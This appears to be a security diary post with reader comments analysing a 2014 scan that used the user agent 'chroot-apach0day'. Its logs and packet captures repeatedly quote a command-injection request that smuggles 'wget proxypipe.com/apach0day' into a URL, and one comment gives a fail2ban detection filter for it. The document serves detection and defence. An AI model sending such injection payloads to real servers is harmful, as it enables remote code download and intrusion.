Interesting HTTP User Agent "chroot-apach0day"
Our reader Robin submitted the following detect:
I've got a site that was scanned this morning by a tool that left these entries in the logs:
[HTTP_USER_AGENT] => chroot-apach0day
[HTTP_REFERRER] => /xA/x0a/x05
[REQUEST_URI] => /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget http://proxypipe.com/apach0day
The URL that appears to be retrieved does not exist, even though the domain does.
In our own web logs, we have seen a couple of similar requests:
162.253.66.77 - - [28/Jul/2014:05:07:15 +0000] "GET /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 301 178 "-" "chroot-apach0day" "-"
162.253.66.77 - - [28/Jul/2014:18:48:36 +0000] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSpart3dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 301 178 "-" "chroot-apach0day" "-"
162.253.66.77 - - [28/Jul/2014:20:04:07 +0000] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSSdns-STAGE2;wget%20proxypipe.com/apach0day; HTTP/1.0" 301 178 "-" "chroot-apach0day-HIDDEN BINDSHELL-ESTAB" "-"
If anybody has any ideas what tool causes these entries, please let us know. Right now, it doesn't look like this is indeed an "Apache 0 Day"
There are a couple other security related sites where users point out this user agent string, with little insight as to what causes the activity or what the goal is.
Network Monitoring and Threat Detection In-Depth | Singapore | Nov 18th - Nov 23rd 2024 |
Comments
Machine 1:
T 162.253.66.77:56655 -> 10.178.172.97:80 [AP]
GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSSdns-STAGE2;wget%20proxypipe.com/apach0day; HTTP/1.0
User-agent: chroot-apach0day-HIDDEN BINDSHELL-ESTAB
Referrer: /xA/x0a/x06HIDDENSHELL--ESTABLISHED
T 10.178.172.97:80 -> 162.253.66.77:56655 [A]
HTTP/1.1 500 Internal Server Error.
Content-Type: image/png.
Content-Length: 928.
Date: Mon, 28 Jul 2014 20:49:51 GMT.
Connection: close.
===========================
Machine 2:
T 162.253.66.77:56655 -> 10.209.31.105:80 [AP]
GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSSdns-STAGE2;wget%20proxypipe.com/apach0day; HTTP/1.0
User-agent: chroot-apach0day-HIDDEN BINDSHELL-ESTAB
Referrer: /xA/x0a/x06HIDDENSHELL--ESTABLISHED
T 10.209.31.105:80 -> 162.253.66.77:56655 [A]
HTTP/1.1 500 Internal Server Error.
Content-Type: image/png.
Content-Length: 928.
Date: Mon, 28 Jul 2014 20:10:22 GMT.
Connection: close.
Anonymous
Jul 29th 2014
1 decade ago
Anonymous
Jul 29th 2014
1 decade ago
Anonymous
Jul 29th 2014
1 decade ago
If you have fail2ban installed, see below. Note locations of the fail2ban files might be different, depending on your OS. The example below is from a Debian server. This sample doesn't cover ban times, etc.---just how to create a filter and add it to jail.local. There are plenty of fail2ban config examples on google for multiple systems.
Quick-And-Dirty (Debian Linux):
1) Create a new file apache-0day.conf in /etc/fail2ban/filter.d that contains:
#Fail2Ban configuration file
#Limited filter to stop apach0day attacks
[Definition]
Option: failregex
#Notes.: regex to match this kind of request:
#162.253.66.77 - - [28/Jul/2014:19:02:00 +0000] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSpart3dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 200 359 "-" "chroot-apach0day"
failregex = ^ -."(GET|POST).\?.proxypipe|apach0day.$
Option: ignoreregex
Notes.: regex to ignore. If this regex matches, the line is ignored.
Values: TEXT
# ignoreregex =
2) Test filter with command: fail2ban-regex /var/log/apache2/access.log /etc/fail2ban/filter.d/apache-0day.conf
3) Edit /etc/fail2banl/jail.local, to add this jail:
[apache-0day] enabled = true port = http,https filter = apache-0day logpath = /var/log/apache*/*access.log maxretry = 2
4) Test the new overall configuration (watch for WARNING and fix, if needed): fail2ban-client -d
5) Re-start fail2ban: /etc/init.d/fail2ban restart
Anonymous
Jul 29th 2014
1 decade ago
I can't make head or tails of the code, it looks like it has been obfuscated
Anonymous
Jul 29th 2014
1 decade ago
162.253.66.77 - - [28/Jul/2014:06:03:18 +0100] "GET /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 200 8590 "-" "chroot-apach0day"
162.253.66.77 - - [28/Jul/2014:20:28:57 +0100] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSpart3dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 200 8590 "-" "chroot-apach0day"
162.253.66.77 - - [28/Jul/2014:20:42:02 +0100] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSSdns-STAGE2;wget%20proxypipe.com/apach0day; HTTP/1.0" 200 8590 "-" "chroot-apach0day-HIDDEN BINDSHELL-ESTAB"
Nothing untoward has happened (the 200 response here is because the front page on this site is flat HTML, so the query string was ignored).
Anonymous
Jul 29th 2014
1 decade ago
162.253.66.77 - - [28/Jul/2014:06:21:18 +0100] "GET /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget%20proxypipe.com/apach0day; HTTP/1.0" 200 640 "-" "chroot-apach0day"
162.253.66.77 - - [28/Jul/2014:22:56:35 +0100] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSSdns-STAGE2;wget%20proxypipe.com/apach0day; HTTP/1.0" 200 640 "-" "chroot-apach0day-HIDDEN BINDSHELL-ESTAB"
Anonymous
Jul 29th 2014
1 decade ago
Link : http://www.alienvault.com/apps/rep_monitor/ip/162.253.66.77/?utm_channnel=InProduct&utm_source=OSSIM&utm_campaign=threatdetails
Anonymous
Jul 29th 2014
1 decade ago
May 07 19:03:47 ipmon[473]: Deny packet r#80:11 re3 162.253.66.74:9359 -> <REMOVED>:22 PR tcp len 20 48 -S IN
May 09 00:14:27 ipmon[473]: Deny packet r#80:11 re3 162.253.66.74:46341 -> <REMOVED>:1080 PR tcp len 20 40 -S IN
May 09 08:29:31 ipmon[473]: Deny packet r#80:11 re3 162.253.66.74:51666 -> <REMOVED>:5000 PR tcp len 20 40 -S IN
May 11 22:31:38 ipmon[473]: Deny packet r#80:11 re3 162.253.66.74:52724 -> <REMOVED>:23 PR tcp len 20 40 -S IN
May 11 23:01:56 ipmon[473]: Deny packet r#80:11 re3 162.253.66.74:52724 -> <REMOVED>:22 PR tcp len 20 40 -S IN
May 16 06:22:12 omb_ftp[51581]: INFO: connect from: 162.253.66.74 to: <REMOVED> redirect: <REMOVED>
May 16 06:22:12 omb_ftp[51581]: INFO: child pid: 43179 connect: 162.253.66.74 -> <REMOVED>
May 16 07:06:15 omb_ftp[51581]: INFO: connect from: 162.253.66.74 to: <REMOVED> redirect: <REMOVED>
May 16 07:06:15 omb_ftp[51581]: INFO: child pid: 46002 connect: 162.253.66.74 -> <REMOVED>
May 20 03:03:33 ipmon[473]: Deny packet r#80:11 re3 162.253.66.74:38261 -> <REMOVED>:1680 PR udp len 20 186 IN
May 26 22:29:32 ipmon[473]: Deny packet r#80:11 re3 162.253.66.76:55193 -> <REMOVED>:9200 PR tcp len 20 40 -S IN
Jun 12 00:50:10 kernel: No server on port re3 162.253.66.76:40409 -> <REMOVED>:60023 PR tcp -S
Jun 12 00:50:10 kernel: No server on port re3 162.253.66.76:40409 -> <REMOVED>:60023 PR tcp -R
Jun 16 17:53:04 ipmon[347]: Deny packet r#80:11 re3 162.253.66.76:54060 -> <REMOVED>:5060 PR tcp len 20 40 -S IN
Jun 21 01:16:33 kernel: No server on port re3 162.253.66.76:43183 -> <REMOVED>:49152 PR tcp -S
Jun 21 01:16:34 kernel: No server on port re3 162.253.66.76:43183 -> <REMOVED>:49152 PR tcp -R
Jun 25 05:07:50 omb_http[399]: INFO: [22127] 162.253.66.76 192.168.0.11:80 "GET /rutorrent HTTP/1.1" - 0 Client unexpectedly closed connection
Jun 25 11:24:25 ipmon[347]: Deny packet r#80:11 re3 162.253.66.77:44182 -> <REMOVED>:22 PR tcp len 20 40 -S IN
Jun 25 18:24:31 omb_http[399]: INFO: [21114] 162.253.66.77:52663 192.168.0.11:80 <none> "GET /rutorrent HTTP/1.0" text/html 301 235
Jun 26 14:12:39 ipmon[347]: Deny packet r#80:11 re3 162.253.66.77:42694 -> <REMOVED>:443 PR tcp len 20 40 -S IN
Jun 26 17:40:44 ipmon[347]: Deny packet r#80:11 re3 162.253.66.77:54925 -> <REMOVED>:8112 PR tcp len 20 40 -S IN
Jul 06 21:27:42 ipmon[347]: Deny packet r#80:11 re3 162.253.66.76:42286 -> <REMOVED>:11211 PR udp len 20 43 IN
Jul 11 12:04:25 ipmon[347]: Deny packet r#80:11 re3 162.253.66.76:49029 -> <REMOVED>:27015 PR tcp len 20 40 -S IN
Jul 11 16:29:19 ipmon[347]: Deny packet r#80:11 re3 162.253.66.76:40895 -> <REMOVED>:8112 PR tcp len 20 40 -S IN
Jul 11 17:04:37 ipmon[347]: Deny packet r#80:11 re3 162.253.66.77:50855 -> <REMOVED>:23 PR tcp len 20 40 -S IN
Jul 26 02:11:06 ipmon[347]: Deny packet r#80:11 re3 162.253.66.76:46535 -> <REMOVED>:3128 PR tcp len 20 40 -S IN
Jul 28 01:03:30 ipmon[347]: Deny packet r#80:11 re3 162.253.66.76:57550 -> <REMOVED>:23 PR tcp len 20 40 -S IN
Jul 28 08:58:46 omb_http[399]: INFO: [27652] 162.253.66.77:41790 192.168.0.11:80 <none> "GET /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget%20proxypipe.com/apach0day; HTTP/1.0" text/html 301 297
Jul 28 22:56:58 omb_http[399]: INFO: [42857] 162.253.66.77:56655 192.168.0.11:80 <none> "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSSdns-STAGE2;wget%20proxypipe.com/apach0day; HTTP/1.0" text/html 301 303
To me it looks like a really slow scan with some added features (apach0day and rutorrent).
Regarding potential threats, even if Apache itself isnt/might not be vulnerable - what about other systems? For example various webstatsscript such as Awstats among others (who acts on whats found in the accesslog)?
My best guess:
1) Someone doing their final preparations before their talk at defcon/blackhat.
_OR_
2) Someone from 4chan trolling the rest of the Internet :-)
Anonymous
Jul 29th 2014
1 decade ago
Anonymous
Jul 29th 2014
1 decade ago